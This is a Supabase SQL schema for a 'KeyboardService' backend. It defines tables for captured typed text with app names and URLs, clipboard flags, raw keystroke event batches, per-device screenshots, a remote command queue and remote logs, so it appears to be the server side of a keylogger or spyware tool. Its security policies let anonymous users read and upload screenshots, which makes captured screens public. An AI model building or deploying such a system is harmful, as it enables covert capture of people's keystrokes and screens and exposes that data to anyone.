-- KeyboardService Supabase schema
-- The application uses the service-role key on the server. Client roles are denied.

create table if not exists public.devices (
  device_id text primary key,
  device_name text not null default 'Unknown device',
  client_version text not null default '',
  client_ip text not null default '',
  local_ip text not null default '',
  last_seen bigint not null,
  started_at bigint not null,
  joined_at bigint not null,
  created_at timestamptz not null default now(),
  updated_at timestamptz not null default now()
);

create index if not exists devices_last_seen_idx
  on public.devices (last_seen desc);

create table if not exists public.messages (
  id bigint primary key,
  text text not null,
  raw_text text not null default '',
  raw_only boolean not null default false,
  device_id text not null default 'unknown',
  device_name text not null default 'Unknown device',
  app_name text not null default 'Unknown app',
  source_url text not null default '',
  time bigint not null,
  is_pasted boolean not null default false,
  is_copied boolean not null default false,
  created_at timestamptz not null default now()
);

create index if not exists messages_time_idx
  on public.messages (time desc);

create index if not exists messages_device_time_idx
  on public.messages (device_id, time desc);

create table if not exists public.raw_batches (
  batch_id text primary key,
  device_id text not null,
  device_name text not null default 'Unknown device',
  session_id text not null,
  started_at bigint not null,
  ended_at bigint not null,
  event_count integer not null check (event_count > 0),
  payload_base64 text not null,
  created_at timestamptz not null default now()
);

create index if not exists raw_batches_device_started_idx
  on public.raw_batches (device_id, started_at desc);

create index if not exists raw_batches_session_started_idx
  on public.raw_batches (session_id, started_at desc);

create table if not exists public.screenshots (
  id bigint generated by default as identity primary key,
  device_id text not null,
  captured_at bigint not null,
  storage_path text not null unique,
  created_at timestamptz not null default now(),
  constraint screenshots_device_fk
    foreign key (device_id) references public.devices(device_id) on delete cascade
);

create index if not exists screenshots_device_captured_idx
  on public.screenshots (device_id, captured_at desc);

create index if not exists screenshots_captured_idx
  on public.screenshots (captured_at desc);

create table if not exists public.device_commands (
  command_id text primary key,
  device_id text not null,
  command text not null,
  message text not null default '',
  requested_by text not null default 'dashboard',
  source text not null default 'dashboard',
  status text not null default 'queued'
    check (status in ('queued', 'claimed', 'completed', 'failed')),
  created_at bigint not null,
  claimed_at bigint,
  completed_at bigint,
  error text,
  constraint device_commands_device_fk
    foreign key (device_id) references public.devices(device_id) on delete cascade
);

create index if not exists device_commands_claim_idx
  on public.device_commands (device_id, status, created_at);

create index if not exists device_commands_history_idx
  on public.device_commands (device_id, created_at desc);

create table if not exists public.audit_events (
  id bigint generated by default as identity primary key,
  event_type text not null,
  actor text not null default 'system',
  source text not null default 'server',
  device_id text not null default '',
  details jsonb not null default '{}'::jsonb,
  created_at bigint not null
);

create index if not exists audit_events_created_idx
  on public.audit_events (created_at desc);

create index if not exists audit_events_device_created_idx
  on public.audit_events (device_id, created_at desc);

create index if not exists audit_events_details_gin_idx
  on public.audit_events using gin (details);

create table if not exists public.service_settings (
  setting_key text primary key,
  setting_value text not null,
  updated_at timestamptz not null default now()
);

create table if not exists public.remote_logs (
  id bigint generated by default as identity primary key,
  device_id text not null default '',
  status text not null default '',
  source text not null default '',
  created_at timestamptz not null default now()
);

create index if not exists remote_logs_created_idx
  on public.remote_logs (created_at desc);

create index if not exists remote_logs_device_created_idx
  on public.remote_logs (device_id, created_at desc);

create or replace function public.touch_updated_at()
returns trigger
language plpgsql
as $$
begin
  new.updated_at = now();
  return new;
end;
$$;

drop trigger if exists devices_updated_at on public.devices;
create trigger devices_updated_at
before update on public.devices
for each row execute function public.touch_updated_at();

drop trigger if exists service_settings_updated_at on public.service_settings;
create trigger service_settings_updated_at
before update on public.service_settings
for each row execute function public.touch_updated_at();

alter table public.devices enable row level security;
alter table public.messages enable row level security;
alter table public.raw_batches enable row level security;
alter table public.screenshots enable row level security;
alter table public.device_commands enable row level security;
alter table public.audit_events enable row level security;
alter table public.service_settings enable row level security;
alter table public.remote_logs enable row level security;

-- Browser roles can access screenshot records because the screenshots bucket is public.
drop policy if exists devices_deny_client on public.devices;
create policy devices_deny_client on public.devices
  for all to anon, authenticated using (false) with check (false);

drop policy if exists messages_deny_client on public.messages;
create policy messages_deny_client on public.messages
  for all to anon, authenticated using (false) with check (false);

drop policy if exists raw_batches_deny_client on public.raw_batches;
create policy raw_batches_deny_client on public.raw_batches
  for all to anon, authenticated using (false) with check (false);

drop policy if exists screenshots_deny_client on public.screenshots;
drop policy if exists screenshots_public_read on public.screenshots;
drop policy if exists screenshots_public_insert on public.screenshots;
create policy screenshots_public_read on public.screenshots
  for select to anon, authenticated using (true);
create policy screenshots_public_insert on public.screenshots
  for insert to anon, authenticated with check (true);

drop policy if exists device_commands_deny_client on public.device_commands;
create policy device_commands_deny_client on public.device_commands
  for all to anon, authenticated using (false) with check (false);

drop policy if exists audit_events_deny_client on public.audit_events;
create policy audit_events_deny_client on public.audit_events
  for all to anon, authenticated using (false) with check (false);

drop policy if exists service_settings_deny_client on public.service_settings;
create policy service_settings_deny_client on public.service_settings
  for all to anon, authenticated using (false) with check (false);

drop policy if exists remote_logs_deny_client on public.remote_logs;
create policy remote_logs_deny_client on public.remote_logs
  for all to anon, authenticated using (false) with check (false);

insert into storage.buckets (id, name, public)
values ('screenshots', 'screenshots', false)
on conflict (id) do update set public = true;

drop policy if exists screenshots_storage_public_insert on storage.objects;
create policy screenshots_storage_public_insert on storage.objects
  for insert to anon, authenticated
  with check (
    bucket_id = 'screenshots'
    and name ~ '^[^/]+/[0-9]+[.]png$'
  );

drop policy if exists screenshots_storage_public_read on storage.objects;
create policy screenshots_storage_public_read on storage.objects
  for select to anon, authenticated
  using (bucket_id = 'screenshots');
